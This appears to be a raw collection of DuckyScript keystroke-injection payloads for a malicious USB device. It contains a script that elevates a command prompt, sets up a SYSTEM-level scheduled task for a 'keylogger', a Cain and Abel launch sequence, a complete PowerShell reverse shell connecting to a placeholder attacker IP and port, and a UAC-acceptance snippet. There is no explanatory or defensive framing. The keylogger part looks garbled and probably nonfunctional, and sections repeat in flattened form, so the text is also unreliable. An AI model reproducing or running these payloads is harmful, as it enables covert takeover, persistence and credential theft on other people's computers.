DELAY 3000
GUI r
DELAY 200
STRING powershell Start-Process cmd -Verb RunAs
DELAY 200
ENTER
DELAY 1000
ALT y
DELAY 500
STRING echo off > %userprofile%\Documents\keylogger.bat
STRING start /min C:\Windows\System32\logman.exe start keylogger -p {0x0,0x0,0x02,0x10} -o %userprofile%\Documents\keylogger.etl -ets -nb 2 2 -bs 1024 -mode Circular
STRING schtasks /create /tn keylogger /tr "%userprofile%\Documents\keylogger.bat" /sc minute /mo 1 /ru SYSTEM /rl HIGHEST
DELAY 500
ENTER
DELAY 500
GUI r
DELAY 200
STRING cmd /c start powershell Get-Content %userprofile%\Documents\keylogger.etl | Foreach-Object { $_ -replace "`n"," "} | findstr /RC:"[Private]"
DELAY 200
ENTER
DUCKYSCRIPT CAIN AND ABLE:
DELAY 2000
GUI r
DELAY 200
STRING cain
ENTER
DELAY 1000
ALT y
DELAY 1000
TAB
TAB
DOWNARROW
DOWNARROW
DOWNARROW
SPACE
DELAY 500
TAB
TAB
DOWNARROW
DOWNARROW
SPACE
DELAY 500
TAB
TAB
DOWNARROW
SPACE
DELAY 500
TAB
TAB
ENTER
DELAY 500
TAB
ENTER
DELAY 500
TAB
ENTER
DELAY 500
TAB
ENTER
DELAY 500
TAB
ENTER
DELAY 500
TAB
ENTER
DELAY 500
TAB
ENTER
Ducky script key logger:
DELAY 3000 GUI r DELAY 200 STRING powershell Start-Process cmd -Verb RunAs DELAY 200 ENTER DELAY 1000 ALT y DELAY 500 STRING echo off > %userprofile%\Documents\keylogger.bat STRING start /min C:\Windows\System32\logman.exe start keylogger -p {0x0,0x0,0x02,0x10} -o %userprofile%\Documents\keylogger.etl -ets -nb 2 2 -bs 1024 -mode Circular STRING schtasks /create /tn keylogger /tr "%userprofile%\Documents\keylogger.bat" /sc minute /mo 1 /ru SYSTEM /rl HIGHEST DELAY 500 ENTER DELAY 500 GUI r DELAY 200 STRING cmd /c start powershell Get-Content %userprofile%\Documents\keylogger.etl | Foreach-Object { $_ -replace "`n"," "} | findstr /RC:"[Private]" DELAY 200 ENTER
DUCKYSCRIPT CAIN AND ABLE:
DELAY 2000 GUI r DELAY 200 STRING cain ENTER DELAY 1000 ALT y DELAY 1000 TAB TAB DOWNARROW DOWNARROW DOWNARROW SPACE DELAY 500 TAB TAB DOWNARROW DOWNARROW SPACE DELAY 500 TAB TAB DOWNARROW SPACE DELAY 500 TAB TAB ENTER DELAY 500 TAB ENTER DELAY 500 TAB ENTER DELAY 500 TAB ENTER DELAY 500 TAB ENTER DELAY 500 TAB ENTER DELAY 500 TAB ENTER
REVERSE SHELL ATTACK:
DELAY 3000 GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING powershell -c "$client = New-Object System.Net.Sockets.TCPClient('attacker-ip', attacker-port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();exit;" ENTER
Privilege Access Script:
DELAY 3000 GUI r DELAY 500 STRING cmd CTRL SHIFT ENTER DELAY 1000 ALT y